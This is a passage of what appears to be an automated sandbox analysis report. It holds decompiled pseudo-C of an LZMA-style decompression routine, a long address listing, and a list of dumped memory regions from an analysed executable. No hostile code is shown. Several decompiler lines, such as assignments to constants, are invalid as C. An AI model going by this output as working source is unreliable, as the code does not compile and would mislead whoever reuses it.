                    								goto L92;
                    							}
                    							__eflags = _v100;
                    							if(_v100 == 0) {
                    								goto L174;
                    							}
                    							__eax = 0;
                    							__eflags = _v60 - 7;
                    							_t264 = _v60 - 7 >= 0;
                    							__eflags = _t264;
                    							0 | _t264 = _t264 + _t264 + 9;
                    							_v60 = _t264 + _t264 + 9;
                    							goto L78;
                    						case 0xa:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__eax = _v8;
                    								__ecx = _v60;
                    								_v136 = 0xb;
                    								__esi = _v8 + 0x1c8 + _v60 * 2;
                    								goto L135;
                    							}
                    							__eax = _v44;
                    							goto L91;
                    						case 0xb:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__ecx = _v40;
                    								__eax = _v36;
                    								_v36 = _v40;
                    							} else {
                    								__eax = _v40;
                    							}
                    							__ecx = _v44;
                    							_v40 = _v44;
                    							L91:
                    							__ecx = _v48;
                    							_v48 = __eax;
                    							_v44 = _v48;
                    							L92:
                    							__eax = _v8;
                    							_v132 = 0x15;
                    							__eax = _v8 + 0xa68;
                    							_v92 = _v8 + 0xa68;
                    							goto L71;
                    						case 0xc:
                    							L102:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0xc;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t340 =  &_v116;
                    							 *_t340 = _v116 + 1;
                    							__eflags =  *_t340;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							__eax = _v48;
                    							goto L104;
                    						case 0xd:
                    							L39:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0xd;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t127 =  &_v116;
                    							 *_t127 = _v116 + 1;
                    							__eflags =  *_t127;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L41:
                    							__eax = _v68;
                    							__eflags = _v76 - _v68;
                    							if(_v76 != _v68) {
                    								goto L50;
                    							}
                    							__eflags = __ebx - 0x100;
                    							if(__ebx >= 0x100) {
                    								goto L56;
                    							}
                    							L43:
                    							__eax = _v95 & 0x000000ff;
                    							_v95 = _v95 << 1;
                    							__ecx = _v92;
                    							__eax = (_v95 & 0x000000ff) >> 7;
                    							_v76 = __eax;
                    							__eax = __eax + 1;
                    							__eax = __eax << 8;
                    							__eax = __eax + __ebx;
                    							__esi = _v92 + __eax * 2;
                    							_v20 = _v20 >> 0xb;
                    							__ax =  *__esi;
                    							_v88 = __esi;
                    							__edx = __ax & 0x0000ffff;
                    							__ecx = (_v20 >> 0xb) * __edx;
                    							__eflags = _v16 - __ecx;
                    							if(_v16 >= __ecx) {
                    								_v20 = _v20 - __ecx;
                    								_v16 = _v16 - __ecx;
                    								__cx = __ax;
                    								_v68 = 1;
                    								__cx = __ax >> 5;
                    								__eflags = __eax;
                    								__ebx = __ebx + __ebx + 1;
                    								 *__esi = __ax;
                    							} else {
                    								_v68 = _v68 & 0x00000000;
                    								_v20 = __ecx;
                    								0x800 = 0x800 - __edx;
                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							__eflags = _v20 - 0x1000000;
                    							_v72 = __ebx;
                    							if(_v20 >= 0x1000000) {
                    								goto L41;
                    							} else {
                    								goto L39;
                    							}
                    						case 0xe:
                    							L48:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0xe;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t161 =  &_v116;
                    							 *_t161 = _v116 + 1;
                    							__eflags =  *_t161;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							while(1) {
                    								L50:
                    								__eflags = __ebx - 0x100;
                    								if(__ebx >= 0x100) {
                    									break;
                    								}
                    								__eax = _v92;
                    								__edx = __ebx + __ebx;
                    								__ecx = _v20;
                    								__esi = __edx + __eax;
                    								__ecx = _v20 >> 0xb;
                    								__ax =  *__esi;
                    								_v88 = __esi;
                    								__edi = __ax & 0x0000ffff;
                    								__ecx = (_v20 >> 0xb) * __edi;
                    								__eflags = _v16 - __ecx;
                    								if(_v16 >= __ecx) {
                    									_v20 = _v20 - __ecx;
                    									_v16 = _v16 - __ecx;
                    									__cx = __ax;
                    									_t175 = __edx + 1; // 0x1
                    									__ebx = _t175;
                    									__cx = __ax >> 5;
                    									__eflags = __eax;
                    									 *__esi = __ax;
                    								} else {
                    									_v20 = __ecx;
                    									0x800 = 0x800 - __edi;
                    									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    									__ebx = __ebx + __ebx;
                    									 *__esi = __cx;
                    								}
                    								__eflags = _v20 - 0x1000000;
                    								_v72 = __ebx;
                    								if(_v20 >= 0x1000000) {
                    									continue;
                    								} else {
                    									goto L48;
                    								}
                    							}
                    							L56:
                    							_t178 =  &_v56;
                    							 *_t178 = _v56 & 0x00000000;
                    							__eflags =  *_t178;
                    							goto L57;
                    						case 0xf:
                    							L60:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0xf;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t208 =  &_v116;
                    							 *_t208 = _v116 + 1;
                    							__eflags =  *_t208;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L62:
                    							__eflags = __ebx - 0x100;
                    							if(__ebx >= 0x100) {
                    								L57:
                    								__al = _v72;
                    								_v96 = _v72;
                    								goto L58;
                    							}
                    							L63:
                    							__eax = _v92;
                    							__edx = __ebx + __ebx;
                    							__ecx = _v20;
                    							__esi = __edx + __eax;
                    							__ecx = _v20 >> 0xb;
                    							__ax =  *__esi;
                    							_v88 = __esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = (_v20 >> 0xb) * __edi;
                    							__eflags = _v16 - __ecx;
                    							if(_v16 >= __ecx) {
                    								_v20 = _v20 - __ecx;
                    								_v16 = _v16 - __ecx;
                    								__cx = __ax;
                    								_t222 = __edx + 1; // 0x1
                    								__ebx = _t222;
                    								__cx = __ax >> 5;
                    								__eflags = __eax;
                    								 *__esi = __ax;
                    							} else {
                    								_v20 = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							__eflags = _v20 - 0x1000000;
                    							_v72 = __ebx;
                    							if(_v20 >= 0x1000000) {
                    								goto L62;
                    							} else {
                    								goto L60;
                    							}
                    						case 0x10:
                    							L112:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0x10;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t371 =  &_v116;
                    							 *_t371 = _v116 + 1;
                    							__eflags =  *_t371;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							goto L114;
                    						case 0x11:
                    							L71:
                    							__esi = _v92;
                    							_v136 = 0x12;
                    							goto L135;
                    						case 0x12:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__eax = _v92;
                    								_v136 = 0x13;
                    								__esi = _v92 + 2;
                    								L135:
                    								_v88 = _t626;
                    								goto L136;
                    							}
                    							__eax = _v80;
                    							_v52 = _v52 & 0x00000000;
                    							__ecx = _v92;
                    							__eax = _v80 << 4;
                    							__eflags = __eax;
                    							__eax = _v92 + __eax + 4;
                    							goto L133;
                    						case 0x13:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								_t475 =  &_v92;
                    								 *_t475 = _v92 + 0x204;
                    								__eflags =  *_t475;
                    								_v52 = 0x10;
                    								_v68 = 8;
                    								L147:
                    								_v128 = 0x14;
                    								goto L148;
                    							}
                    							__eax = _v80;
                    							__ecx = _v92;
                    							__eax = _v80 << 4;
                    							_v52 = 8;
                    							__eax = _v92 + (_v80 << 4) + 0x104;
                    							L133:
                    							_v92 = __eax;
                    							_v68 = 3;
                    							goto L147;
                    						case 0x14:
                    							_v52 = _v52 + __ebx;
                    							__eax = _v132;
                    							goto L143;
                    						case 0x15:
                    							__eax = 0;
                    							__eflags = _v60 - 7;
                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    							__al = __al & 0x000000fd;
                    							__eax = (__eflags >= 0) - 1 + 0xb;
                    							_v60 = (__eflags >= 0) - 1 + 0xb;
                    							goto L123;
                    						case 0x16:
                    							__eax = _v52;
                    							__eflags = __eax - 4;
                    							if(__eax >= 4) {
                    								_push(3);
                    								_pop(__eax);
                    							}
                    							__ecx = _v8;
                    							_v68 = 6;
                    							__eax = __eax << 7;
                    							_v128 = 0x19;
                    							_v92 = __eax;
                    							goto L148;
                    						case 0x17:
                    							L148:
                    							__eax = _v68;
                    							_v84 = 1;
                    							_v76 = _v68;
                    							goto L152;
                    						case 0x18:
                    							L149:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0x18;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t490 =  &_v116;
                    							 *_t490 = _v116 + 1;
                    							__eflags =  *_t490;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L151:
                    							_t493 =  &_v76;
                    							 *_t493 = _v76 - 1;
                    							__eflags =  *_t493;
                    							L152:
                    							__eflags = _v76;
                    							if(_v76 <= 0) {
                    								__ecx = _v68;
                    								__ebx = _v84;
                    								0 = 1;
                    								__eax = 1 << __cl;
                    								__ebx = _v84 - (1 << __cl);
                    								__eax = _v128;
                    								_v72 = __ebx;
                    								L143:
                    								_v140 = _t561;
                    								goto L3;
                    							}
                    							__eax = _v84;
                    							_v20 = _v20 >> 0xb;
                    							__edx = _v84 + _v84;
                    							__eax = _v92;
                    							__esi = __edx + __eax;
                    							_v88 = __esi;
                    							__ax =  *__esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = (_v20 >> 0xb) * __edi;
                    							__eflags = _v16 - __ecx;
                    							if(_v16 >= __ecx) {
                    								_v20 = _v20 - __ecx;
                    								_v16 = _v16 - __ecx;
                    								__cx = __ax;
                    								__cx = __ax >> 5;
                    								__eax = __eax - __ecx;
                    								__edx = __edx + 1;
                    								__eflags = __edx;
                    								 *__esi = __ax;
                    								_v84 = __edx;
                    							} else {
                    								_v20 = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								_v84 = _v84 << 1;
                    								 *__esi = __cx;
                    							}
                    							__eflags = _v20 - 0x1000000;
                    							if(_v20 >= 0x1000000) {
                    								goto L151;
                    							} else {
                    								goto L149;
                    							}
                    						case 0x19:
                    							__eflags = __ebx - 4;
                    							if(__ebx < 4) {
                    								_v48 = __ebx;
                    								L122:
                    								_t399 =  &_v48;
                    								 *_t399 = _v48 + 1;
                    								__eflags =  *_t399;
                    								L123:
                    								__eax = _v48;
                    								__eflags = __eax;
                    								if(__eax == 0) {
                    									_v52 = _v52 | 0xffffffff;
                    									goto L173;
                    								}
                    								__eflags = __eax - _v100;
                    								if(__eax > _v100) {
                    									goto L174;
                    								}
                    								_v52 = _v52 + 2;
                    								__eax = _v52;
                    								_t406 =  &_v100;
                    								 *_t406 = _v100 + _v52;
                    								__eflags =  *_t406;
                    								goto L126;
                    							}
                    							__ecx = __ebx;
                    							__eax = __ebx;
                    							__ecx = __ebx >> 1;
                    							__eax = __ebx & 0x00000001;
                    							__ecx = (__ebx >> 1) - 1;
                    							__al = __al | 0x00000002;
                    							__eax = (__ebx & 0x00000001) << __cl;
                    							__eflags = __ebx - 0xe;
                    							_v48 = __eax;
                    							if(__ebx >= 0xe) {
                    								__ebx = 0;
                    								_v76 = __ecx;
                    								L105:
                    								__eflags = _v76;
                    								if(_v76 <= 0) {
                    									__eax = __eax + __ebx;
                    									_v68 = 4;
                    									_v48 = __eax;
                    									__eax = _v8;
                    									__eax = _v8 + 0x644;
                    									__eflags = __eax;
                    									L111:
                    									__ebx = 0;
                    									_v92 = __eax;
                    									_v84 = 1;
                    									_v72 = 0;
                    									_v76 = 0;
                    									L115:
                    									__eax = _v68;
                    									__eflags = _v76 - _v68;
                    									if(_v76 >= _v68) {
                    										_t397 =  &_v48;
                    										 *_t397 = _v48 + __ebx;
                    										__eflags =  *_t397;
                    										goto L122;
                    									}
                    									__eax = _v84;
                    									_v20 = _v20 >> 0xb;
                    									__edi = _v84 + _v84;
                    									__eax = _v92;
                    									__esi = __edi + __eax;
                    									_v88 = __esi;
                    									__ax =  *__esi;
                    									__ecx = __ax & 0x0000ffff;
                    									__edx = (_v20 >> 0xb) * __ecx;
                    									__eflags = _v16 - __edx;
                    									if(_v16 >= __edx) {
                    										__ecx = 0;
                    										_v20 = _v20 - __edx;
                    										__ecx = 1;
                    										_v16 = _v16 - __edx;
                    										__ebx = 1;
                    										__ecx = _v76;
                    										__ebx = 1 << __cl;
                    										__ecx = 1 << __cl;
                    										__ebx = _v72;
                    										__ebx = _v72 | __ecx;
                    										__cx = __ax;
                    										__cx = __ax >> 5;
                    										__eax = __eax - __ecx;
                    										__edi = __edi + 1;
                    										__eflags = __edi;
                    										_v72 = __ebx;
                    										 *__esi = __ax;
                    										_v84 = __edi;
                    									} else {
                    										_v20 = __edx;
                    										0x800 = 0x800 - __ecx;
                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    										_v84 = _v84 << 1;
                    										 *__esi = __dx;
                    									}
                    									__eflags = _v20 - 0x1000000;
                    									if(_v20 >= 0x1000000) {
                    										L114:
                    										_t374 =  &_v76;
                    										 *_t374 = _v76 + 1;
                    										__eflags =  *_t374;
                    										goto L115;
                    									} else {
                    										goto L112;
                    									}
                    								}
                    								__ecx = _v16;
                    								__ebx = __ebx + __ebx;
                    								_v20 = _v20 >> 1;
                    								__eflags = _v16 - _v20;
                    								_v72 = __ebx;
                    								if(_v16 >= _v20) {
                    									__ecx = _v20;
                    									_v16 = _v16 - _v20;
                    									__ebx = __ebx | 0x00000001;
                    									__eflags = __ebx;
                    									_v72 = __ebx;
                    								}
                    								__eflags = _v20 - 0x1000000;
                    								if(_v20 >= 0x1000000) {
                    									L104:
                    									_t344 =  &_v76;
                    									 *_t344 = _v76 - 1;
                    									__eflags =  *_t344;
                    									goto L105;
                    								} else {
                    									goto L102;
                    								}
                    							}
                    							__edx = _v8;
                    							__eax = __eax - __ebx;
                    							_v68 = __ecx;
                    							__eax = _v8 + 0x55e + __eax * 2;
                    							goto L111;
                    						case 0x1a:
                    							L58:
                    							__eflags = _v104;
                    							if(_v104 == 0) {
                    								_v140 = 0x1a;
                    								goto L173;
                    							}
                    							__ecx = _v108;
                    							__al = _v96;
                    							__edx = _v12;
                    							_v100 = _v100 + 1;
                    							_v108 = _v108 + 1;
                    							_v104 = _v104 - 1;
                    							 *_v108 = __al;
                    							__ecx = _v24;
                    							 *(_v12 + __ecx) = __al;
                    							__eax = __ecx + 1;
                    							__edx = 0;
                    							_t197 = __eax % _v120;
                    							__eax = __eax / _v120;
                    							__edx = _t197;
                    							goto L82;
                    						case 0x1b:
                    							L78:
                    							__eflags = _v104;
                    							if(_v104 == 0) {
                    								_v140 = 0x1b;
                    								goto L173;
                    							}
                    							__eax = _v24;
                    							__eax = _v24 - _v48;
                    							__eflags = __eax - _v120;
                    							if(__eax >= _v120) {
                    								__eax = __eax + _v120;
                    								__eflags = __eax;
                    							}
                    							__edx = _v12;
                    							__cl =  *(__edx + __eax);
                    							__eax = _v24;
                    							_v96 = __cl;
                    							 *(__edx + __eax) = __cl;
                    							__eax = __eax + 1;
                    							__edx = 0;
                    							_t280 = __eax % _v120;
                    							__eax = __eax / _v120;
                    							__edx = _t280;
                    							__eax = _v108;
                    							_v100 = _v100 + 1;
                    							_v108 = _v108 + 1;
                    							_t289 =  &_v104;
                    							 *_t289 = _v104 - 1;
                    							__eflags =  *_t289;
                    							 *_v108 = __cl;
                    							L82:
                    							_v24 = __edx;
                    							goto L83;
                    						case 0x1c:
                    							while(1) {
                    								L126:
                    								__eflags = _v104;
                    								if(_v104 == 0) {
                    									break;
                    								}
                    								__eax = _v24;
                    								__eax = _v24 - _v48;
                    								__eflags = __eax - _v120;
                    								if(__eax >= _v120) {
                    									__eax = __eax + _v120;
                    									__eflags = __eax;
                    								}
                    								__edx = _v12;
                    								__cl =  *(__edx + __eax);
                    								__eax = _v24;
                    								_v96 = __cl;
                    								 *(__edx + __eax) = __cl;
                    								__eax = __eax + 1;
                    								__edx = 0;
                    								_t420 = __eax % _v120;
                    								__eax = __eax / _v120;
                    								__edx = _t420;
                    								__eax = _v108;
                    								_v108 = _v108 + 1;
                    								_v104 = _v104 - 1;
                    								_v52 = _v52 - 1;
                    								__eflags = _v52;
                    								 *_v108 = __cl;
                    								_v24 = _t420;
                    								if(_v52 > 0) {
                    									continue;
                    								} else {
                    									L83:
                    									_v140 = 2;
                    									goto L3;
                    								}
                    							}
                    							_v140 = 0x1c;
                    							L173:
                    							_push(0x22);
                    							_pop(_t574);
                    							memcpy(_v148,  &_v140, _t574 << 2);
                    							return 0;
                    					}
                    				}
                    				L174:
                    				_t538 = _t537 | 0xffffffff;
                    				return _t538;
                    			}
                    0x00406436
                    0x00406444
                    0x00406447
                    0x0040644a
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00406453
                    0x00406453
                    0x00406456
                    0x0040645d
                    0x00406462
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00406343
                    0x00406343
                    0x00406346
                    0x00000000
                    0x00000000
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x00000000
                    0x00406776
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00406734
                    0x00406734
                    0x00000000
                    0x00406734
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x004068d2
                    0x004068d8
                    0x004068da
                    0x004068e1
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
